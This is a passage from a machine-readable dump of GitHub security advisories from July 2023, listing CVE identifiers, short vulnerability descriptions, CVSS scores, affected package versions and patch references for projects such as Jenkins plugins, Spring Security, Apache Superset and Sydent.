[patch](https://github.com/codecentric/spring-boot-admin/pull/2615) for this issue.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'de.codecentric:spring-boot-admin-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-38286'}, {'type': 'WEB', 'url': 'https://github.com/codecentric/spring-boot-admin/issues/2613'}, {'type': 'WEB', 'url': 'https://github.com/thymeleaf/thymeleaf/issues/966'}, {'type': 'WEB', 'url': 'https://github.com/codecentric/spring-boot-admin/pull/2615'}, {'type': 'WEB', 'url': 'https://github.com/codecentric/spring-boot-admin/commit/f1f6ac6f613e1c0afc121c8989f28b4155a6797a'}, {'type': 'WEB', 'url': 'https://github.com/codecentric/spring-boot-admin/commit/f1f6ac6f613e1c0afc121c8989f28b4155a6797a#diff-1ea8b144c29588e08221597d56d8be10b4b4a210f248a83f2e837152a3d2e0d7'}, {'type': 'PACKAGE', 'url': 'https://github.com/codecentric/spring-boot-admin'}, {'type': 'WEB', 'url': 'https://github.com/codecentric/spring-boot-admin/blob/master/spring-boot-admin-server/pom.xml'}, {'type': 'WEB', 'url': 'https://github.com/p1n93r/SpringBootAdmin-thymeleaf-SSTI'}]","{'cwe_ids': ['CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-14T21:50:50Z', 'nvd_published_at': None}" 1.4.0,GHSA-5g87-44p9-v4j7,2023-07-12T22:30:05Z,2023-07-12T18:30:39Z,,['CVE-2023-37963'],Jenkins Benchmark Evaluator Plugin missing permission check,"Jenkins Benchmark Evaluator Plugin 1.0.1 and earlier does not perform a permission check in a method implementing form validation. This allows attackers with Overall/Read permission to connect to an attacker-specified URL and to check for the existence of directories, `.csv`, and `.ycsb` files on the Jenkins controller file system. Additionally, this form validation method does not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'io.jenkins.plugins:benchmark-evaluator'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37963'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-07-12/#SECURITY-3119'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/07/12/2'}]","{'cwe_ids': ['CWE-862'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-12T22:30:05Z', 'nvd_published_at': None}" 1.4.0,GHSA-7jrr-fwhw-762v,2023-07-20T14:29:55Z,2023-07-12T18:30:39Z,,['CVE-2023-37958'],Jenkins Sumologic Publisher Plugin vulnerable to cross-site request forgery,"Jenkins Sumologic Publisher Plugin 2.2.1 and earlier does not perform a permission check in a method implementing form validation. This allows attackers with Overall/Read permission to connect to an attacker-specified URL. Additionally, this form validation method does not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:sumologic-publisher'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.2.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37958'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-07-12/#SECURITY-3117'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/07/12/2'}]","{'cwe_ids': ['CWE-352'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-12T22:30:57Z', 'nvd_published_at': None}" 1.4.0,GHSA-3h6f-g5f3-gc4w,2023-07-31T21:19:15Z,2023-07-19T15:30:26Z,,['CVE-2023-34034'],Access Control Bypass in Spring Security,"Using ""**"" as a pattern in Spring Security configuration for WebFlux creates a mismatch in pattern matching between Spring Security and Spring WebFlux, and the potential for a security bypass. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.springframework.security:spring-security-config'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.6.0'}, {'fixed': '5.6.12'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.springframework.security:spring-security-config'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.7.0'}, {'fixed': '5.7.10'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.springframework.security:spring-security-config'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.8.0'}, {'fixed': '5.8.5'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.springframework.security:spring-security-config'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.5'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.springframework.security:spring-security-config'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.1.0'}, {'fixed': '6.1.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34034'}, {'type': 'WEB', 'url': 'https://ossindex.sonatype.org/vulnerability/CVE-2023-34034'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230814-0008/'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORKSECURITY-5777893'}, {'type': 'WEB', 'url': 'https://spring.io/security/cve-2023-34034'}]","{'cwe_ids': ['CWE-284'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-07-31T21:19:15Z', 'nvd_published_at': None}" 1.4.0,GHSA-fxjg-28fm-pfxh,2023-07-06T22:10:49Z,2023-07-06T19:24:15Z,,['CVE-2023-25504'],Apache Superset Server-Side Request Forgery vulnerability,"A malicious actor who has been authenticated and granted specific permissions in Apache Superset may use the import dataset feature in order to conduct Server-Side Request Forgery attacks and query internal resources on behalf of the server where Superset is deployed. This vulnerability exists in Apache Superset versions up to and including 2.0.1. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'apache-superset'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25504'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/superset'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/tdnzkocfsqg2sbbornnp9g492fn4zhtx'}]","{'cwe_ids': ['CWE-918'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-06T22:10:49Z', 'nvd_published_at': '2023-04-17T17:15:00Z'}" 1.4.0,GHSA-mjmq-gwgm-5qhm,2023-08-21T13:55:24Z,2023-07-10T18:30:49Z,,['CVE-2023-35887'],Apache MINA SSHD information disclosure vulnerability,"Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Software Foundation Apache MINA. In SFTP servers implemented using Apache MINA SSHD that use a RootedFileSystem, logged users may be able to discover ""exists/does not exist"" information about items outside the rooted tree via paths including parent navigation ("".."") beyond the root, or involving symlinks. This issue affects Apache MINA: from 1.0 before 2.10. Users are recommended to upgrade to 2.10 Until version 2.1.0, some of the code affected by this vulnerability appeared in org.apache.sshd:sshd-core. Version 2.1.0 contains a [commit](https://github.com/apache/mina-sshd/commit/10de190e7d3f9189deb76b8d08c72334a1fe2df0) where the code was moved to the package org.apache.sshd:sshd-common, which did not exist until version 2.1.0. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.sshd:sshd-common'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.10.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.sshd:sshd-sftp'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '2.10.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.sshd:sshd-core'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '2.10.0'}]}], 'database_specific': {'last_known_affected_version_range': '< 2.1.0'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-35887'}, {'type': 'WEB', 'url': 'https://github.com/apache/mina-sshd/pull/362'}, {'type': 'WEB', 'url': 'https://github.com/apache/mina-sshd/commit/10de190e7d3f9189deb76b8d08c72334a1fe2df0'}, {'type': 'WEB', 'url': 'https://github.com/apache/mina-sshd/commit/a61e93035f06bff8fc622ad94870fb773d48b9f0'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/mina-sshd'}, {'type': 'WEB', 'url': 'https://issues.apache.org/jira/browse/SSHD-1324'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/b9qgtqvhnvgfpn0w1gz918p21p53tqk2'}]","{'cwe_ids': ['CWE-200', 'CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-10T21:53:01Z', 'nvd_published_at': None}" 1.4.0,GHSA-pj4x-2xr5-w87m,2023-07-28T15:33:38Z,2023-07-28T15:33:38Z,,['CVE-2023-38495'],Possible image tampering from missing image validation for Packages,"### Impact Crossplanes image backend does not validate the byte contents of Crossplane packages. As such, Crossplane does not detect if an attacker has tampered with a Package. ### Patches The problem has been fixed in 1.11.5, 1.12.3 and 1.13.0, all the supported versions of Crossplane at the time of writing. ### Workarounds Only using images from trusted sources and keeping Package editing/creating privileges to administrators only, which should be both considered already best practices. ### References See `ADA-XP-23-11` in the Security Audit's [report](https://github.com/crossplane/crossplane/blob/ac8b24fe739c5d942ea885157148497f196c3dd3/security/ADA-security-audit-23.pdf). ### Credits This was reported as `ADA-XP-23-11` by @AdamKorcz and @DavidKorczynski from Ada Logic and facilitated by OSTIF as part of the Security Audit sponsored by CNCF.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/crossplane/crossplane'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.5'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/crossplane/crossplane'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.12.0'}, {'fixed': '1.12.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/crossplane/crossplane/security/advisories/GHSA-pj4x-2xr5-w87m'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-38495'}, {'type': 'PACKAGE', 'url': 'https://github.com/crossplane/crossplane'}, {'type': 'WEB', 'url': 'https://github.com/crossplane/crossplane/blob/ac8b24fe739c5d942ea885157148497f196c3dd3/security/ADA-security-audit-23.pdf'}]","{'cwe_ids': ['CWE-20'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-28T15:33:38Z', 'nvd_published_at': None}" 1.4.0,GHSA-g8c3-6fj2-87w7,2023-07-20T14:53:01Z,2023-07-12T18:30:38Z,,['CVE-2023-37943'],Jenkins Active Directory Plugin vulnerable to Active Directory credential disclosure,"Jenkins Active Directory Plugin allows testing a new, unsaved configuration by performing a connection test (the button labeled ""Test Domain""). Active Directory Plugin 2.30 and earlier ignores the ""Require TLS"" and ""StartTls"" options and always performs the connection test to Active directory unencrypted. This allows attackers able to capture network traffic between the Jenkins controller and Active Directory servers to obtain Active Directory credentials. This only affects the connection test. Connections established during the login process are encrypted if the corresponding TLS option is enabled. Active Directory Plugin 2.30.1 considers the ""Require TLS"" and ""StartTls"" options for connection tests.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:active-directory'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.30.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37943'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-07-12/#SECURITY-3059'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/07/12/2'}]","{'cwe_ids': ['CWE-311'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-12T19:49:50Z', 'nvd_published_at': None}" 1.4.0,GHSA-p6hw-wm59-3g5g,2023-08-04T18:41:16Z,2023-07-31T22:03:44Z,,['CVE-2023-38686'],Sydent does not verify email server certificates,"## Impact If configured to send emails using TLS, Sydent does not verify SMTP servers' certificates. This makes Sydent's emails vulnerable to interception via a [man-in-the-middle (MITM) attack](https://en.wikipedia.org/wiki/Man-in-the-middle_attack). Attackers with privileged access to the network can intercept room invitations and address confirmation emails. CVSS 3.1 overall score: 3.3 - [AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N/CR:L/IR:L/AR:X/MAV:A/MAC:H/MPR:N/MUI:N/MS:C/MC:L/MI:L/MA:N](https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N/CR:L/IR:L/AR:X/MAV:A/MAC:H/MPR:N/MUI:N/MS:C/MC:L/MI:L/MA:N&version=3.1) _Reported by Martin Schobert, [Pentagrid AG](https://pentagrid.ch/)._ ### Details Sydent can be configured to send emails over a TLS-encrypted socket by setting ```yaml email: tlsmode: ""TLS"" # or the legacy value ""SSL"" ``` in its config file. Alternatively it can be configured to use [Opportunistic TLS](https://en.wikipedia.org/wiki/Opportunistic_TLS) by setting ```yaml email: tlsmode: ""STARTTLS"" ``` In both situations, Sydent will encrypt its communication with the SMTP server when sending emails. **In affected versions, Sydent will not verify the destination server's certificate.** ### Vulnerability Sydent sends email for two purposes: - to inform a third party that they have been invited to a Matrix room by their email address; and - to verify that a given Matrix user controls an email address. Therefore, attackers capable of running a MITM attack can 1. Intercept room invitations sent to an email address. The invitation includes - the room ID and its avatar, and - the inviter's username, displayname and their avatar, and - credentials for a guest Matrix account on the inviter's homeserver. 2. Intercept address ownership confirmation emails. This would allow the attacker to falsely claim ownership of the indented recipient's Matrix account, if that account was permitted to log in using an email address and no other authentication factors. ### Patches This is patched in [Sydent 2.5.6](https://github.com/matrix-org/sydent/releases/tag/v2.5.6), see PR https://github.com/matrix-org/sydent/pull/574. When patching, make sure that Sydent trusts the certificate of the server it is connecting to. This should happen automatically when using properly issued certificates. If you are using self-signed certificates, make sure to copy your Certification Authority certificate, or your self signed certificate if using only one, to the trust store of your operating system. ### Workarounds One can ensure Sydent's emails fail to send by setting the configured SMTP server to a loopback or [non-routable](https://datatracker.ietf.org/doc/html/rfc1918#section-3) address under your control which does not have a listening SMTP server. For example: ```yaml email: smtphost: ""localhost"" # Assuming there is no SMTP server listening on localhost ``` ### References - https://github.com/matrix-org/sydent/pull/574 implements the fix. - https://github.com/matrix-org/sydent/releases/tag/v2.5.6 is the release including this fix. - https://docs.python.org/3/library/ssl.html?highlight=ssl#security-considerations details the best-practice advice on how to use the standard library `smtp` module safely. - https://peps.python.org/pep-0476/ (accepted) proposed enabling TLS certificate verification by default in standard library HTTP clients. - https://github.com/python/cpython/issues/91826 discusses enabling TLS certificate verification by default in the Python standard library, for SMTP and other protocols. ## For more information If you have any questions or comments about this advisory, e-mail us at [security@matrix.org](mailto:security@matrix.org).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'matrix-sydent'}, 'ecosystem_specific': {'affected_functions': ['sydent.util.emailutils.sendEmail']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.5.6'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/matrix-org/sydent/security/advisories/GHSA-p6hw-wm59-3g5g'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-38686'}, {'type': 'WEB', 'url': 'https://github.com/python/cpython/issues/91826'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/sydent/pull/574'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/sydent/commit/1cd748307c6b168b66154e6c4db715d4b9551261'}, {'type': 'WEB', 'url': 'https://docs.python.org/3/library/ssl.html?highlight=ssl#security-considerations'}, {'type': 'PACKAGE', 'url': 'https://github.com/matrix-org/sydent'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/sydent/releases/tag/v2.5.6'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/matrix-sydent/PYSEC-2023-139.yaml'}, {'type': 'WEB', 'url': 'https://peps.python.org/pep-0476/'}]","{'cwe_ids': ['CWE-295'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-07-31T22:03:44Z', 'nvd_published_at': None}" 1.4.0,GHSA-5652-92r9-3fx9,2023-07-18T19:10:54Z,2023-07-11T22:46:57Z,,['CVE-2023-34089'],Decidim Cross-site Scripting vulnerability in the processes filter,"### Impact The processes filter feature is susceptible to Cross-site scripting. This allows a remote attacker to execute JavaScript code in the context of a currently logged-in user. An attacker could use this vulnerability to make other users endorse or support proposals they have no intention of supporting or endorsing. ### Patches The problem was patched in [v0.27.3](https://github.com/decidim/decidim/releases/tag/v0.27.3) and [v0.26.7](https://github.com/decidim/decidim/releases/tag/v0.26.7) ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'decidim'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.14.0'}, {'fixed': '0.26.7'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'decidim'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.27.0'}, {'fixed': '0.27.3'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'decidim-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.14.0'}, {'fixed': '0.26.7'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'decidim-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.27.0'}, {'fixed': '0.27.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/decidim/decidim/security/advisories/GHSA-5652-92r9-3fx9'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34089'}, {'type': 'PACKAGE', 'url': 'https://github.com/decidim/decidim'}, {'type': 'WEB', 'url': 'https://github.com/decidim/decidim/releases/tag/v0.26.6'}, {'type': 'WEB', 'url': 'https://github.com/decidim/decidim/releases/tag/v0.26.7'}, {'type': 'WEB', 'url': 'https://github.com/decidim/decidim/releases/tag/v0.27.3'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/decidim-core/CVE-2023-34089.yml'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/decidim/CVE-2023-34089.yml'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-11T22:46:57Z', 'nvd_published_at': None}" 1.4.0,GHSA-f44m-65h3-99vc,2023-07-11T22:45:55Z,2023-07-11T15:31:18Z,,['CVE-2023-3620'],tarteaucitron.js vulnerable to Cross-site Scripting,Cross-site Scripting (XSS) - Stored in GitHub repository amauric/tarteaucitron.js prior to v1.13.1.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'tarteaucitronjs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.13.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-3620'}, {'type': 'WEB', 'url': 'https://github.com/amauric/tarteaucitron.js/commit/c4c2fcf2b2212ce968bdcae145bb74283c441e5f'}, {'type': 'WEB', 'url': 'https://github.com/AmauriC/tarteaucitron.js/releases/tag/v1.13.1'}, {'type': 'PACKAGE', 'url': 'https://github.com/amauric/tarteaucitron.js'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/a0fd0671-f051-4d41-8928-9b19819084c9'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-11T22:45:55Z', 'nvd_published_at': None}" 1.4.0,GHSA-vh2g-6c4x-5hmp,2023-07-25T13:54:13Z,2023-07-25T13:54:13Z,,['CVE-2023-26045'],Path traversal and code execution via prototype vulnerability,"### Impact Due to the use of the [object destructuring assignment](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Operators/Destructuring_assignment) syntax in the user export code path, combined with a path traversal vulnerability, a specially crafted payload could invoke the user export logic to arbitrarily execute javascript files on the local disk. ### Patches Patched in v2.8.7 ### Workarounds Site maintainers can cherry pick ec58700f6dff8e5b4af1544f6205ec362b593092 into their codebase to patch the exploit.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'nodebb'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.8.7'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/NodeBB/NodeBB/security/advisories/GHSA-vh2g-6c4x-5hmp'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26045'}, {'type': 'WEB', 'url': 'https://github.com/NodeBB/NodeBB/commit/ec58700f6dff8e5b4af1544f6205ec362b593092'}, {'type': 'PACKAGE', 'url': 'https://github.com/NodeBB/NodeBB'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230831-0004/'}]","{'cwe_ids': ['CWE-22'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-07-25T13:54:13Z', 'nvd_published_at': None}" 1.4.0,GHSA-m384-pj54-5vr2,2023-07-20T14:56:45Z,2023-07-12T12:31:35Z,,['CVE-2022-42009'],Apache Ambari Expression Language Injection vulnerability,"SpringEL injection in the server agent in Apache Ambari version 2.7.0 to 2.7.6 allows a malicious authenticated user to execute arbitrary code remotely. Users are recommended to upgrade to 2.7.7. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.ambari:ambari'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.7.0'}, {'fixed': '2.7.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-42009'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/ambari'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/6xf477ttz1oxmg0bx0tpdoz2mlqd7sbc'}]","{'cwe_ids': ['CWE-917'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-12T17:29:48Z', 'nvd_published_at': None}" 1.4.0,GHSA-wx79-r3q8-fq9h,2023-07-06T23:28:55Z,2023-07-06T21:14:59Z,,['CVE-2023-31066'],Apache InLong has Files or Directories Accessible to External Parties in Apache InLong,"Files or Directories Accessible to External Parties vulnerability in Apache Software Foundation Apache InLong. This issue affects Apache InLong: from 1.4.0 through 1.6.0. Different users in InLong could delete, edit, stop, and start others' sources. Users are advised to upgrade to Apache InLong's 1.7.0 or cherry-pick https://github.com/apache/inlong/pull/7775 to solve it. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.inlong:manager-service'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.4.0'}, {'fixed': '1.7.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.inlong:manager-web'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.4.0'}, {'fixed': '1.7.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-31066'}, {'type': 'WEB', 'url': 'https://github.com/apache/inlong/pull/7775'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/inlong'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/x7y05wo37sq5l9fnmmsjh2dr9kcjrcxf'}]","{'cwe_ids': ['CWE-552'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-07-06T23:28:55Z', 'nvd_published_at': None}" 1.4.0,GHSA-hhvx-8755-4cvw,2023-07-06T21:54:20Z,2023-07-06T19:24:11Z,,['CVE-2023-1296'],Hashicorp Nomad ACLs Cannot Deny Access to Workload’s Own Variables,"A vulnerability was identified in Nomad and Nomad Enterprise (“Nomad”) such that a deny ACL capability could not be applied to a workload’s own variables. If included, the Nomad ACL system will silently fail to block access. This vulnerability, CVE-2023-1296, was fixed in Nomad 1.4.6 and 1.5.1.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/nomad'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.4.0'}, {'fixed': '1.4.6'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/nomad'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.5.0'}, {'fixed': '1.5.1'}]}], 'versions': ['1.5.0']}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1296'}, {'type': 'WEB', 'url': 'https://discuss.hashicorp.com/t/hcsec-2023-09-nomad-acls-can-not-deny-access-to-workloads-own-variables/51390'}, {'type': 'PACKAGE', 'url': 'https://github.com/hashicorp/nomad'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-06T21:54:20Z', 'nvd_published_at': '2023-03-14T15:15:00Z'}" 1.4.0,GHSA-xqr8-7jwr-rhp7,2023-08-03T19:36:12Z,2023-07-25T14:43:53Z,,['CVE-2023-37920'],Removal of e-Tugra root certificate,"Certifi 2023.07.22 removes root certificates from ""e-Tugra"" from the root store. These are in the process of being removed from Mozilla's trust store. e-Tugra's root certificates are being removed pursuant to an investigation prompted by reporting of security issues in their systems. Conclusions of Mozilla's investigation can be found [here](https://groups.google.com/a/mozilla.org/g/dev-security-policy/c/C-HrP1SEq1A).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'certifi'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2015.4.28'}, {'fixed': '2023.7.22'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/certifi/python-certifi/security/advisories/GHSA-xqr8-7jwr-rhp7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37920'}, {'type': 'WEB', 'url': 'https://github.com/certifi/python-certifi/commit/8fb96ed81f71e7097ed11bc4d9b19afd7ea5c909'}, {'type': 'PACKAGE', 'url': 'https://github.com/certifi/python-certifi'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/certifi/PYSEC-2023-135.yaml'}, {'type': 'WEB', 'url': 'https://groups.google.com/a/mozilla.org/g/dev-security-policy/c/C-HrP1SEq1A'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5EX6NG7WUFNUKGFHLM35KHHU3GAKXRTG/'}]","{'cwe_ids': ['CWE-345'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-25T14:43:53Z', 'nvd_published_at': None}" 1.4.0,GHSA-667r-p4gg-7m2q,2023-07-21T18:02:39Z,2023-07-13T18:30:35Z,,['CVE-2023-37785'],ImpressCMS Cross-site Scripting vulnerability,A cross-site 